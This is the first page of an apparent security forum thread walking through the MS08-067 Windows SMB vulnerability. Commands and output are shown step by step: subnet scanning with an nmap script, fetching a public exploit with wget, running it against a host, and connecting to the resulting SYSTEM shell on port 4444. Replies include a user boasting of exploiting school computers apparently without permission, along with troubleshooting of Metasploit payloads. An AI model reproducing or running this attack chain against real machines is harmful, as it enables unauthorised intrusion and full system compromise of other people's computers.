Page 1 of 3 123 LastLast
Results 1 to 10 of 41

Thread: Playing with ms08_067

Hybrid View

  1. #1
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default Playing with ms08_067

    So since some other people have posted some stuff on this exploit I figured I'd see what I could add. The first really cool thing I found (Thanks Arkaic)
    was a script for nmap which checks for the vulnerability. If anyone is unfamiliar with the nmap scripting engine you are really missing out. Maybe if there is some demand we can do a write up on it later. So we need to check out a experimental branch on nmap in order to get the needed libraries for it to work. If your nmap breaks because of this its not my fault. Mine is fine so your should be as well. Ok here we go
    Code:
    b4cktr4ck3 / # svn co --username guest --password "" svn://svn.insecure.org/nmap-exp/ron
    b4cktr4ck3 / # cd ron/nmap-smb
    b4cktr4ck3 nmap-smb # ./configure
    b4cktr4ck3 nmap-smb # make
    b4cktr4ck3 nmap-smb # make install
    Ok so all we did was rebuild nmap with a new branch. This actually gives us a bunch of new scripts to check out but for the sake of this post we will only use one. So now we can run a scan. The reason I searched this out is because the metasploit module to do the scan test (to my knowledge) only does one host at a time. I was looking to cover subnets if need be.

    Okay so lets run our new script...
    Code:
    b4cktr4ck3 ron # nmap -T insane --script smb-check-vulns.nse  -p 445 192.168.1.0/24 
    
    Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
    Interesting ports on firewall.localhost.com (192.168.1.1):
    PORT    STATE    SERVICE
    445/tcp filtered microsoft-ds
    MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)
    
    Interesting ports on 192.168.1.127:
    PORT    STATE  SERVICE
    445/tcp closed microsoft-ds
    
    Interesting ports on 192.168.1.128:
    PORT    STATE  SERVICE
    445/tcp closed microsoft-ds
    MAC Address: 00:04:4B:18:69:8A (Nvidia)
    
    Interesting ports on 192.168.1.237:
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    MAC Address: 00:0C:29:4A:B6:6D (VMware)
    
    Host script results:
    |_ smb-check-vulns: This host is vulnerable to MS08-067
    
    Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 seconds
    As you can see we have a victim...er winner!

    So just so this post wont be so short and lame we can also go ahead and see if we can pop this box. For this trick I'll go to milw0rm and grab a recent .py sploit on the subject.
    Code:
    b4cktr4ck3 / # wget http://www.milw0rm.com/exploits/download/7132.py
    --13:45:35--  http://www.milw0rm.com/exploits/download/7132.py
               => `7132.py'
    Resolving www.milw0rm.com... 76.74.9.18
    Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/plain]
    
        [ <=>                              ] 7,085         --.--K/s             
    
    13:45:35 (233.53 KB/s) - `7132.py' saved [7085]
    Ok so if you open up the exploit (which you should always do) and give it a quick read you will see there is a windows 2003 payload (#2) and a 2000 payload(#1) {thanks to TheX1le} so due to our scan results we are going to need 2003 so...
    Code:
    b4cktr4ck3 / # python 7132.py 192.168.1.237 2
    #######################################################################
    #   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
    #   www.hackingspirits.com
    #   www.coffeeandsecurity.com
    #   Email: d3basis.m0hanty @ gmail.com
    #######################################################################
    
    [-]Windows 2003[SP2] payload loaded
    [-]Initiating connection
    [-]connected to ncacn_np:192.168.1.237[\pipe\browser]
    [-]Exploit sent to target successfully...
    [1]Telnet to port 4444 on target machine...
    cool seems we have successfully "poped" the box so lets see...
    Code:
    b4cktr4ck3 / # telnet 192.168.1.237 4444
    Trying 192.168.1.237...
    Connected to 192.168.1.237.
    Escape character is '^]'.
    Microsoft Windows [Version 5.2.3790]
    (C) Copyright 1985-2003 Microsoft Corp.
    
    C:\WINDOWS\system32>
    Very Nice!
    Code:
    C:\WINDOWS\system32>whoami
    whoami
    nt authority\system
    Well thats it for this post. If you found any of this info helpful please let me know and I will post more how to's on this type of thing otherwise just tell me I suck and I'll go back to moderating with a iron fist

  2. #2
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    5

    Thumbs up awesome! :)

    Very nice post Pure!

    Just for info...

    We can do the same with metasploit and the "old" nmap+db_autopwn, but with metasploit we can reach more targets, because is prepared to more windows languages..

    btw, thanks, very nice post!

    cheers!

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Quote Originally Posted by thebug View Post
    Very nice post Pure!

    Just for info...

    We can do the same with metasploit and the "old" nmap+db_autopwn, but with metasploit we can reach more targets, because is prepared to more windows languages..

    btw, thanks, very nice post!

    cheers!
    I would never use autopwn in a real test situation. Its far to noisy. Also the "old" nmap as you put it does not do what this nmap script does. The script checks the port and then reports whether its vulnerable or not.

  4. #4
    Just burned his ISO Lammer's Avatar
    Join Date
    Nov 2008
    Posts
    11

    Default Great!

    Very nice how-to pureh@te.
    I think this kind of info its very very usefull.
    Please keep sending them.

  5. #5
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    6

    Default

    I was able to successfully sploit 3 windows XP SP2 boxes at school with this technique just today. I don't know about SP3 though

  6. #6
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by anonymoususer View Post
    I was able to successfully sploit 3 windows XP SP2 boxes at school with this technique just today. I don't know about SP3 though
    With permission of course........



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  7. #7
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    19

    Default

    @anonymoususer

    R u sure you done it on XP-SP2 as it does not have the payload for xp-sp2 and i have myself tried on 3 machines of XP-SP2 which has the port open but exploit doesnt work neither the script tell

    results like:
    |_ smb-check-vulns: This host is vulnerable to MS08-067

    but just show port open


    @pureh@te

    its just AWSOME we need more like that

  8. #8
    Just burned his ISO
    Join Date
    Oct 2008
    Posts
    14

    Default nmap.org

    awesome post, led me to nmap.org where i found some more very interestng things about nmap,



    thanks pureh@te keep up the great work.

  9. #9
    Junior Member Tr00g33k's Avatar
    Join Date
    Jul 2008
    Posts
    46

    Default

    OK I have one wiered problem, i get the message
    Exploit sent to target successfully
    Telnet to port 4444 on target machine
    And when i try to telnet: connection refuesed, any idea?

    Tr00G33k

    and if i use metasploit:

    msf exploit(ms08_067_netapi) > exploit[*] Started reverse handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Exploit completed, but no session was created.
    msf exploit(ms08_067_netapi) >

  10. #10

    Default

    What kind of payload are you using? If it is a simple tcp_backdoor then on the box you just exploited, open a cmd shell, run netstat -an and if you see TCP/4444 listening, then the problem is probably firewall related.

    If you are using a reverse_tcp_backdoor, then my guess is that the victim is not allowing the backdoor to install/execute. Try a different payload.

    Since you provided no information about your network or victim host setup, this is all I can think of.

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •